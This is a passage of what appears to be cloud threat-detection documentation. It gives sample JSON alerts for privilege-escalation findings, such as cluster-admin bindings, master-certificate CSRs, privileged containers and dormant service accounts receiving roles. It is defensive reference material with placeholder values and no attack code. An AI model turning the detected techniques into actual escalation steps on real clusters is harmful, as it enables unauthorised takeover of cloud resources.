"projects/PROJECT_ID", "timestamp": { "seconds": "1675913160", "nanos": 929341814 }, "insertId": "o5ii7hddddd" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/" } } } }
Privilege escalation: Changes to sensitive kubernetes RBAC objects
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "US" }, "serviceName": "k8s.io", "methodName": "io.k8s.authorization.rbac.v1.clusterrolebindings.update" }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/05b52fe8267d44bdb33c89367f0dd11a", "category": "Privilege Escalation: Changes to sensitive Kubernetes RBAC objects", "contacts": { "technical": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2022-10-07T07:42:36.536Z", "database": {}, "eventTime": "2022-10-07T07:42:06.044Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd", "indicator": {}, "kubernetes": { "bindings": [ { "name": "cluster-admin", "role": { "kind": "CLUSTER_ROLE", "name": "cluster-admin" }, "subjects": [ { "kind": "USER", "name": "testUser-1665153212" } ] } ] }, "mitreAttack": {}, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/05b52fe8267d44bdb33c89367f0dd11a", "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME", "severity": "LOW", "sourceDisplayName": "Event Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME", "display_name": "CLUSTER_NAME", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parent_display_name": "PROJECT_ID", "type": "google.container.Cluster", "folders": [ { "resourceFolderDisplayName": "FOLDER_NAME", "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER" } ] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "gke_control_plane", "subRuleName": "edit_sensitive_rbac_object" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//k8s.io/rbac.authorization.k8s.io/v1/clusterrolebindings/cluster-admin" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1665128526", "nanos": 44146000 }, "insertId": "5d80de5c-84b8-4f42-84c7-6b597162e00a" } } ], "properties": {}, "findingId": "05b52fe8267d44bdb33c89367f0dd11a", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0004/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222022-10-07T07:42:06.044146Z%22%0AinsertId%3D%225d80de5c-84b8-4f42-84c7-6b597162e00a%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project=PROJECT_ID" } ], "relatedFindingUri": {} } } }
Privilege escalation: Create kubernetes CSR for master cert
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "US" }, "serviceName": "k8s.io", "methodName": "io.k8s.certificates.v1.certificatesigningrequests.create" }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/0562169c2e3b44879030a7369dbf839c", "category": "Privilege Escalation: Create Kubernetes CSR for master cert", "contacts": { "technical": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2022-10-08T14:38:12.501Z", "database": {}, "eventTime": "2022-10-08T14:37:46.944Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd", "indicator": {}, "kubernetes": {}, "mitreAttack": {}, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/0562169c2e3b44879030a7369dbf839c", "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME", "severity": "HIGH", "sourceDisplayName": "Event Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME", "display_name": "CLUSTER_NAME", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parent_display_name": "PROJECT_ID", "type": "google.container.Cluster", "folders": [ { "resourceFolderDisplayName": "FOLDER_NAME", "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER" } ] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "gke_control_plane", "subRuleName": "csr_for_master_cert" }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "//k8s.io/certificates.k8s.io/v1/certificatesigningrequests/node-csr-fake-master" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1665239866", "nanos": 944045000 }, "insertId": "4d17b41e-7f56-43dc-9b72-abcbdc64f101" } } ], "properties": {}, "findingId": "0562169c2e3b44879030a7369dbf839c", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0004/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222022-10-08T14:37:46.944045Z%22%0AinsertId%3D%224d17b41e-7f56-43dc-9b72-abcbdc64f101%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project=PROJECT_ID" } ], "relatedFindingUri": {} } } }
Privilege escalation: Creation of sensitive kubernetes bindings
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "US" }, "serviceName": "k8s.io", "methodName": "io.k8s.authorization.rbac.v1.clusterrolebindings.create" }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/02dcbf565d9d4972a126ac3c38fd4295", "category": "Privilege Escalation: Creation of sensitive Kubernetes bindings", "contacts": { "technical": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2022-10-11T09:29:44.425Z", "database": {}, "eventTime": "2022-10-11T09:29:26.309Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd", "indicator": {}, "kubernetes": { "bindings": [ { "name": "cluster-admin", "role": { "kind": "CLUSTER_ROLE", "name": "cluster-admin" } } ] }, "mitreAttack": {}, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/02dcbf565d9d4972a126ac3c38fd4295", "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME", "severity": "LOW", "sourceDisplayName": "Event Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME", "display_name": "CLUSTER_NAME", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parent_display_name": "PROJECT_ID", "type": "google.container.Cluster", "folders": [ { "resourceFolderDisplayName": "FOLDER_NAME", "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER" } ] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "gke_control_plane", "subRuleName": "create_sensitive_binding" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//k8s.io/rbac.authorization.k8s.io/v1/clusterrolebindings/cluster-admin" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1665480566", "nanos": 309136000 }, "insertId": "e4b2fb24-a118-4d74-80ea-2ec069251321" } } ], "properties": {}, "findingId": "02dcbf565d9d4972a126ac3c38fd4295", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0004/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222022-10-11T09:29:26.309136Z%22%0AinsertId%3D%22e4b2fb24-a118-4d74-80ea-2ec069251321%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project=PROJECT_ID" } ], "relatedFindingUri": {} } } }
Privilege Escalation: Default Compute Engine Service Account SetIAMPolicy
{ "finding": { "access": { "principalEmail": "PROJECT_NUMBER-compute@developer.gserviceaccount.com", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "REGION_CODE" }, "userAgent": "USER_AGENT", "serviceName": "run.googleapis.com", "methodName": "google.cloud.run.v1.Services.SetIamPolicy", "principalSubject": "serviceAccount:PROJECT_NUMBER-compute@developer.gserviceaccount.com", "serviceAccountDelegationInfo": [ { "principalEmail": "service-PROJECT_NUMBER@serverless-robot-prod.iam.gserviceaccount.com" } ] }, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/global/findings/FINDING_ID", "category": "Privilege Escalation: Default Compute Engine Service Account SetIAMPolicy", "chokepoint": {}, "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "createTime": "2025-05-27T20:36:26.627Z", "database": {}, "dataProtectionKeyGovernance": {}, "eventTime": "2025-05-27T20:36:26.527Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "logEntries": [ { "cloudLoggingEntry": { "insertId": "INSERT_ID", "logId": "cloudaudit.googleapis.com/activity", "resourceContainer": "projects/PROJECT_ID", "timestamp": "2025-05-27T20:35:26.897015Z" } } ], "mitreAttack": { "primaryTactic": "PRIVILEGE_ESCALATION", "primaryTechniques": [ "ADDITIONAL_CLOUD_ROLES" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Event Threat Detection", "resourceName": "//run.googleapis.com/projects/PROJECT_ID/locations/REGION/services/SERVICE_NAME", "securityPosture": {}, "severity": "LOW", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//run.googleapis.com/projects/PROJECT_ID/locations/REGION/services/SERVICE_NAME", "displayName": "SERVICE_NAME", "type": "google.run.Service", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "run.googleapis.com", "location": "REGION", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_NUMBER", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_NUMBER" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "cloud_run_services_set_iam_policy" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//run.googleapis.com/projects/PROJECT_ID/locations/REGION/services/SERVICE_NAME" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1748378126", "nanos": 897015000 }, "insertId": "INSERT_ID", "logId": "cloudaudit.googleapis.com/activity" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1098/003/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ], "relatedFindingUri": {} } } }
Privilege Escalation: Dormant Service Account Granted Sensitive Role
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "REGION_CODE" }, "serviceName": "cloudresourcemanager.googleapis.com", "methodName": "SetIamPolicy", }, "assetDisplayName": "ASSET_DISPLAY_NAME", "assetId": "organizations/ORGANIZATION_ID/assets/ASSET_ID", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Privilege Escalation: Dormant Service Account Granted Sensitive Role", "cloudDlpInspection": {}, "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS_1" }, { "email": "EMAIL_ADDRESS_2" } ] }, "technical": { "contacts": [ { "email": "EMAIL_ADDRESS_3" }, { "email": "EMAIL_ADDRESS_4" } ] } }, "createTime": "CREATE_TIMESTAMP", "database": {}, "eventTime": "EVENT_TIMESTAMP", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "iamBindings": [ { "action": "ADD", "role": "SENSITIVE_IAM_ROLE", "member": "serviceAccount:DORMANT_SERVICE_ACCOUNT" } ], "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "INITIAL_ACCESS", "primaryTechniques": [ "VALID_ACCOUNTS", "CLOUD_ACCOUNTS" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "RESOURCE_FULL_NAME", "severity": "SEVERITY_CLASSIFICATION", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "RESOURCE_FULL_NAME", "display_name": "RESOURCE_DISPLAY_NAME", "project_name": "//RESOURCE/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "RESOURCE_PARENT_NAME", "parent_display_name": "PARENT_DISPLAY_NAME", "type": "RESOURCE_TYPE", "folders": [ { "resourceFolderDisplayName": "RESOURCE_FOLDER_DISPLAY_NAME", "resourceFolder": "RESOURCE_FOLDER_ID" } ] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "sensitive_role_added_to_dormant_sa" }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "GOOGLE_CLOUD_RESOURCE_NAME" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1678897327", "nanos": 26483000 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/004/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ] } } }
Privilege Escalation: External Member Added To Privileged Group
This finding isn't available for project-level activations.
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//cloudidentity.googleapis.com/groups/GROUP_NAME@ORGANIZATION_NAME", "state": "ACTIVE", "category": "Privilege Escalation: External Member Added To Privileged Group", "sourceProperties": { "sourceId": { "organizationNumber": "ORGANIZATION_ID", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "persistence", "indicator": "audit_log", "ruleName": "external_member_added_to_privileged_group" }, "detectionPriority": "HIGH", "affectedResources": [{ "gcpResourceName": "//cloudidentity.googleapis.com/groups/GROUP_NAME@ORGANIZATION_NAME" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID" }], "evidence": [{ "sourceLogId": { "resourceContainer": "organizations/ORGANIZATION_ID", "timestamp": { "seconds": "1633622881", "nanos": 6.73869E8 }, "insertId": "INSERT_ID" } }], "properties": { "externalMemberAddedToPrivilegedGroup": { "principalEmail": "PRINCIPAL_EMAIL", "groupName": "group:GROUP_NAME@ORGANIZATION_NAME", "externalMember": "user:EXTERNAL_EMAIL", "sensitiveRoles": [{ "resource": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "roleName": ["ROLES"] }] } }, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": " https://attack.mitre.org/techniques/T1078" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-10-07T16:08:01.673869Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22%22?project\u003d" }] } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-10-07T16:08:03.888Z", "createTime": "2021-10-07T16:08:04.516Z", "severity": "HIGH", "workflowState": "NEW", "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "findingClass": "THREAT" }, "resource": { "name": "//cloudidentity.googleapis.com/groups/GROUP_NAME@ORGANIZATION_NAME" } }
Privilege Escalation: Get Kubernetes CSR with compromised bootstrap credentials
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "US" }, "serviceName": "k8s.io", "methodName": "io.k8s.certificates.v1.certificatesigningrequests.list" }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/025e0ba774da4d678883257cd125fc43", "category": "Privilege Escalation: Get Kubernetes CSR with compromised bootstrap credentials", "contacts": { "technical": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2022-10-12T12:28:11.480Z", "database": {}, "eventTime": "2022-10-12T12:28:08.597Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd", "indicator": {}, "kubernetes": {}, "mitreAttack": {}, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/025e0ba774da4d678883257cd125fc43", "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME", "severity": "HIGH", "sourceDisplayName": "Event Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME", "display_name": "CLUSTER_NAME", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parent_display_name": "PROJECT_ID", "type": "google.container.Cluster", "folders": [ { "resourceFolderDisplayName": "FOLDER_NAME", "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER" } ] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "gke_control_plane", "subRuleName": "get_csr_with_compromised_bootstrap_credentials" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//k8s.io/certificates.k8s.io/v1/certificatesigningrequests" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1665577688", "nanos": 597107000 }, "insertId": "a189aaf0-90dc-4aaf-a48c-1daa850dd993" } } ], "properties": {}, "findingId": "025e0ba774da4d678883257cd125fc43", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0004/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222022-10-12T12:28:08.597107Z%22%0AinsertId%3D%22a189aaf0-90dc-4aaf-a48c-1daa850dd993%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project=PROJECT_ID" } ], "relatedFindingUri": {} } } }
Privilege Escalation: Impersonation Role Granted for Dormant Service Account
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "REGION_CODE" }, "serviceName": "iam.googleapis.com", "methodName": "google.iam.admin.v1.SetIAMPolicy" }, "assetDisplayName": "ASSET_DISPLAY_NAME", "assetId": "organizations/ORGANIZATION_ID/assets/ASSET_ID", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Privilege Escalation: Impersonation Role Granted for Dormant Service Account", "cloudDlpInspection": {}, "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS_1" }, { "email": "EMAIL_ADDRESS_2" } ] }, "technical": { "contacts": [ { "email": "EMAIL_ADDRESS_3" }, { "email": "EMAIL_ADDRESS_4" } ] } }, "createTime": "CREATE_TIMESTAMP", "database": {}, "eventTime": "EVENT_TIMESTAMP", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "iamBindings": [ { "action": "ADD", "role": "roles/iam.serviceAccountTokenCreator", "member": "IAM_Account_Who_Received_Impersonation_Role" } ], "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "INITIAL_ACCESS", "primaryTechniques": [ "VALID_ACCOUNTS", "CLOUD_ACCOUNTS" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//iam.googleapis.com/projects/PROJECT_ID/serviceAccounts/DORMANT_SERVICE_ACCOUNT_ID", "severity": "MEDIUM", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//iam.googleapis.com/projects/PROJECT_ID/serviceAccounts/DORMANT_SERVICE_ACCOUNT_ID", "display_name": "projects/PROJECT_ID/serviceAccounts/DORMANT_SERVICE_ACCOUNT_EMAIL", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parent_display_name": "PROJECT_ID", "type": "google.iam.ServiceAccount", "folders": [ { "resourceFolderDisplayName": "RESOURCE_FOLDER_DISPLAY_NAME", "resourceFolder": "RESOURCE_FOLDER_ID" } ] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "impersonation_role_granted_over_dormant_sa" }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "GOOGLE_CLOUD_RESOURCE_NAME" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1678897327", "nanos": 26483000 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/004/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ] } } }
Privilege Escalation: Launch of privileged Kubernetes container
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "US" }, "serviceName": "k8s.io", "methodName": "io.k8s.core.v1.pods.create" }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/04206668443b45078d5b51c908ad87da", "category": "Privilege Escalation: Launch of privileged Kubernetes container", "contacts": { "technical": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2022-10-08T21:43:41.145Z", "database": {}, "eventTime": "2022-10-08T21:43:09.188Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd", "indicator": {}, "kubernetes": { "pods": [ { "ns": "default", "name": "POD_NAME", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_URI" } ] } ] }, "mitreAttack": {}, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/04206668443b45078d5b51c908ad87da", "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME", "severity": "LOW", "sourceDisplayName": "Event Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME", "display_name": "CLUSTER_NAME", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parent_display_name": "PROJECT_ID", "type": "google.container.Cluster", "folders": [ { "resourceFolderDisplayName": "FOLDER_NAME", "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER" } ] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "gke_control_plane", "subRuleName": "launch_privileged_container" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//k8s.io/core/v1/namespaces/default/pods/POD_NAME" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1665265389", "nanos": 188357000 }, "insertId": "98b6dfb7-05f6-4279-a902-7e18e815364c" } } ], "properties": {}, "findingId": "04206668443b45078d5b51c908ad87da", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0004/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222022-10-08T21:43:09.188357Z%22%0AinsertId%3D%2298b6dfb7-05f6-4279-a902-7e18e815364c%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project=PROJECT_ID" } ], "relatedFindingUri": {} } } }
Privilege Escalation: Privileged Group Opened To Public
This finding isn't available for project-level activations.
